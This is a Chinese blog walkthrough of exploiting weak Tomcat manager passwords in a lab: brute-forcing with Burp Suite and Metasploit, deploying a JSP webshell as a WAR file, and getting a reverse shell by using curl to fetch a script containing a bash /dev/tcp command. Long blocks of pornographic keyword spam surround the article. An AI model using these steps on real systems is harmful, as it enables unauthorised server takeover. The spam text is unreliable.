成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術文章
文章詳情頁

Tomcat弱口令復現及利用(反彈shell)

瀏覽:338日期:2023-03-19 16:52:04
目錄
  • 漏洞描述
  • 復現
    • 環境
    • 攻擊流程
  • 利用
    • msf利用
    • 反彈shell利用
  • 參考文章

    漏洞描述

    Tomcat有一個管理后臺,其用戶名和密碼在Tomcat安裝目錄下的conf\tomcat-users.xml文件中配置,不少管理員為了方便,經常采用弱口令。Tomcat 支持在后臺部署 war 文件,可以直接將 webshell 部署到 web 目錄下。其中,欲訪問后臺,需要對應用戶有相應權限。
    Tomcat7+ 權限分為:
    manager(后臺管理)

    manager-gui 擁有html頁面權限
    manager-status 擁有查看status的權限
    manager-script 擁有text接口的權限,和status權限
    manager-jmx 擁有jmx權限,和status權限
    host-manager(虛擬主機管理)

    admin-gui 擁有html頁面權限
    admin-script 擁有text接口權限
    二、漏洞影響
    Tomcat <= 6.0.0 默認用戶名為admin,密碼為空,無暴力破解限制。
    Tomcat >= 6.0.0 無默認用戶,五次失敗后,賬戶即被鎖定。
    但是正常安裝的情況下,tomcat8 中默認沒有任何用戶,且 Manager 頁面只允許本地 IP 訪問。只有管理員手工修改了這些屬性的情況下,才可以進行攻擊。

    復現

    環境

    一臺攻擊機(kali-2021)192.168.141.190
    受害機(vulhub搭建的)192.168.141.194
    一臺用來下載反彈shell腳本的服務器(內網,如果有服務器更好)192.168.141.128(利用時讓受害主機下載shell文件實現反彈shell)

    攻擊流程

    按照前人經驗可以使用burpsuite進行爆破或者使用msf進行爆破
    首先是根據burpsuite進行爆破:
    抓取請求數據包可以看到

    =其中沒有看到熟悉的賬號密碼,但是其中’Authorization: Basic dG9tY2F0OnRvbWNhdA=='將其中的base64字符串解密可以看到結果格式為"tomcat:tomcat"所以將請求包送至爆破模塊,構造格式為x:x的payload

    結果中的200即為成功,但是前面說明了tomcat8或有防爆破機制,當一個用戶名登錄超過五次就會鎖定賬戶,網上有說要用"tomcat暴破圖形化—繞過tomcat 6/7/8的防暴破機制"這個腳本來繞過但是作者沒有找到免費的,就不測試了.
    其次使用過msf進行爆破

    msf中找到上面的模塊配置出options的rhosts和rport就可以進行爆破(run)了

    可以看到用戶名和密碼在都是tomcat的時候爆破成功,而且可以看到msf應該是自帶了繞過防爆破腳本,而且可以通過自定義user和password文件進行測試,所以作者更推薦使用msf爆破方式

    利用

    msf利用

    這里強調一下,在作者復現網上說的使用exploit/multi/http/tomcat_mgr_deploy但是在配置好rhoss和rport進行run的時候出現無法拿到shell問題

    所以作者使用了exploit/multi/http/tomcat_mgr_upload進行利用配置同deploy,配置httpusername,httppassword,rhosts.rport 然后運行拿到shell

    反彈shell利用

    整體思路:首先在網頁端登錄進管理后臺上傳jsp后門文件,然后訪問這個jsp后門即可,雖然上傳之后就可以通過shell軟件控制,但是為了復習反彈shell的過程,作者將進一步通過上傳的jsp一句話木馬(也可以上傳大馬)進行反彈shell.

    首先將一句話shelloneword.jsp(一句話木馬文件)通過命令,jar cvf shelloneword.war shelloneword.jsp 執行成功后在管理后臺找到如下然后上傳

    成功之后可以在這看到結果

    之后通過各種軟件訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i= xxxx就行了

    但是作者的方式是通過讓受害主機訪問服務器主機下載shell文件,進行反彈shell,所以前面只是中間過程,首先讓受害主機執行i=curl -o /shell.sh http://192.168.141.128/shell.txt 其中shell.txt文件內容為

    bash -i >& /dev/tcp/192.168.141.190/7777 0>&1

    將ip和端口改為自己的,然后打開nc 監聽7777端口,訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i=bash /shell.sh

    反彈shell成功

    參考文章

    [1] https://blog.csdn.net/qq_33020901/article/details/98357659
    [2] https://blog.csdn.net/weixin_44037296/article/details/116376114
    [3] https://blog.csdn.net/qq_43665434/article/details/116903953
    [4] https://www.cnblogs.com/henry666/p/14379888.html
    [5]https://www.cnblogs.com/qianxinggz/p/13440366.html
    [6]https://blog.csdn.net/weixin_42432317/article/details/90208213

    到此這篇關于Tomcat弱口令復現及利用(反彈shell)的文章就介紹到這了,更多相關Tomcat弱口令復現內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

    標簽: Tomcat
    成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
    日韩一区二区在线看片| 亚洲成人动漫精品| 成人免费在线视频观看| 日韩成人av影视| 好吊视频一区二区三区四区| 在线观看日韩电影| 一区二区三区在线观看国产| 成人高清在线视频| 欧美午夜影院一区| 午夜视频一区二区| 亚洲一级高清| 国产日韩欧美综合一区| 国产乱色国产精品免费视频| 免费看黄裸体一级大秀欧美| 国产精品美女久久久久久2018| 成人黄色在线视频| 7777精品久久久大香线蕉 | 91免费观看在线| 欧美精品国产精品| 美日韩一区二区三区| 国产精品婷婷| 国产精品色噜噜| 97久久精品人人做人人爽50路| 欧美老人xxxx18| 日韩av在线播放中文字幕| 99精品视频免费全部在线| 国产精品私人影院| 91在线精品秘密一区二区| 欧美日韩视频在线一区二区| 亚洲午夜久久久久久久久电影网 | 欧美国产日韩亚洲一区| 成人丝袜18视频在线观看| 欧美久久久久久久久| 看片的网站亚洲| 色就色 综合激情| 亚洲v精品v日韩v欧美v专区| 亚洲黄色成人| 欧美tickling挠脚心丨vk| 国产一区二区精品久久99| 欧美日韩国产电影| 精彩视频一区二区三区| 欧美色电影在线| 黄色资源网久久资源365| 色婷婷精品大视频在线蜜桃视频| 亚州成人在线电影| 久久国产主播精品| 午夜欧美大尺度福利影院在线看| 久久国产一区二区| 日韩成人一级片| 91久久精品一区二区二区| 免费人成在线不卡| 亚洲综合国产激情另类一区| 一区二区三区小说| 国产欧美日韩一区二区三区在线| 亚洲精品免费在线观看| 伊伊综合在线| 一区二区高清免费观看影视大全 | 夜夜精品浪潮av一区二区三区| 极品少妇一区二区三区| 亚洲欧洲日产国码二区| 日韩午夜免费视频| 亚洲在线视频网站| 久久国产精品免费一区| 乱中年女人伦av一区二区| 欧美精品久久一区| av电影一区二区| 国产偷国产偷精品高清尤物| 91美女片黄在线观看91美女| 国产精品乱人伦| 亚洲精品婷婷| 日本aⅴ亚洲精品中文乱码| 欧美三区免费完整视频在线观看| 国产一区中文字幕| 日韩免费视频线观看| 成人av高清在线| 中文字幕制服丝袜成人av | 亚洲精品在线三区| 99re热这里只有精品免费视频| 国产欧美一区视频| 伊甸园精品99久久久久久| 亚洲激情网站免费观看| 亚洲一区图片| 日韩1区2区3区| 欧美亚洲综合一区| 国产精选一区二区三区| 久久一区二区三区国产精品| 91视频在线看| 日韩美女视频19| 美女黄网久久| 国产乱码字幕精品高清av| 日韩欧美国产三级| 国产精品地址| 丝袜诱惑亚洲看片| 欧美一区二区三区视频免费| 欧美暴力喷水在线| 亚洲国产美女搞黄色| 欧美日本一区二区| 色综合色狠狠综合色| 亚洲精品国产品国语在线app| 色综合久久88色综合天天免费| 国产一区二区三区四区五区美女| 日韩欧美国产一二三区| 国产综合激情| 日本成人在线电影网| 精品国产1区二区| 亚洲精美视频| 经典三级在线一区| 国产精品天天看| 91久久精品网| 99国产精品一区| 亚洲一区二区三区四区五区黄| 欧美体内she精高潮| 欧美凹凸一区二区三区视频| 一区二区三区在线视频免费| 日本韩国欧美一区二区三区| 国产精品亚洲成人| 中文字幕一区在线观看| 欧美色图12p| 欧美日韩国产高清视频| 亚洲午夜电影在线观看| 日韩天堂在线观看| av不卡在线看| 粉嫩在线一区二区三区视频| 玉米视频成人免费看| 日韩一级高清毛片| 在线高清一区| 国产酒店精品激情| 日韩一区在线看| 欧美日韩精品久久久| 国产一区二区中文| 韩日精品视频一区| 亚洲人成精品久久久久| 制服丝袜中文字幕一区| 99国产精品| 成人美女在线观看| 亚洲高清中文字幕| 精品成a人在线观看| 久久一区亚洲| 色综合久久中文字幕综合网| 日韩极品在线观看| 欧美韩日一区二区三区| 欧美精品日韩综合在线| 亚洲视频播放| 成人精品gif动图一区| 亚洲国产综合视频在线观看| 久久综合成人精品亚洲另类欧美 | 欧美精品一卡| 国产揄拍国内精品对白| 一区二区三区四区激情| 精品国产123| 在线免费视频一区二区| 亚洲夫妻自拍| www.欧美精品一二区| 免费在线观看日韩欧美| 国产精品每日更新| 91麻豆精品国产91久久久更新时间 | 91在线丨porny丨国产| 美女被吸乳得到大胸91| 国产精品电影一区二区三区| 91精品国产乱| 久久综合九色综合欧美狠狠| 黄色综合网站| www.成人网.com| 精品午夜久久福利影院| 亚洲柠檬福利资源导航| 久久久精品综合| 欧美日韩国产影片| 亚洲伊人网站| 亚洲第一区色| 成人激情免费视频| 青草国产精品久久久久久| 自拍偷拍国产精品| 久久久久久久久蜜桃| 欧美精品色综合| 久久久久久亚洲精品杨幂换脸 | 欧美日韩一区 二区 三区 久久精品| 欧美日韩亚洲一区二区三区在线观看 | 色系网站成人免费| 精品91在线| 91蝌蚪porny九色| 国产91精品免费| 久久综合九色综合欧美就去吻| 欧洲精品在线观看| 亚洲三级观看| 亚洲天堂偷拍| 国内揄拍国内精品久久| 黄色av成人| 日韩一级网站| 噜噜噜噜噜久久久久久91 | 日本在线不卡视频| 久久99久久久久| 国产在线一区观看| 成人成人成人在线视频| 欧美在线高清| 亚洲精品国产日韩| 久久亚洲国产精品日日av夜夜| 欧美日韩黄色影视| 精品国产电影一区二区| 日本一区二区三区免费乱视频| 中文字幕色av一区二区三区|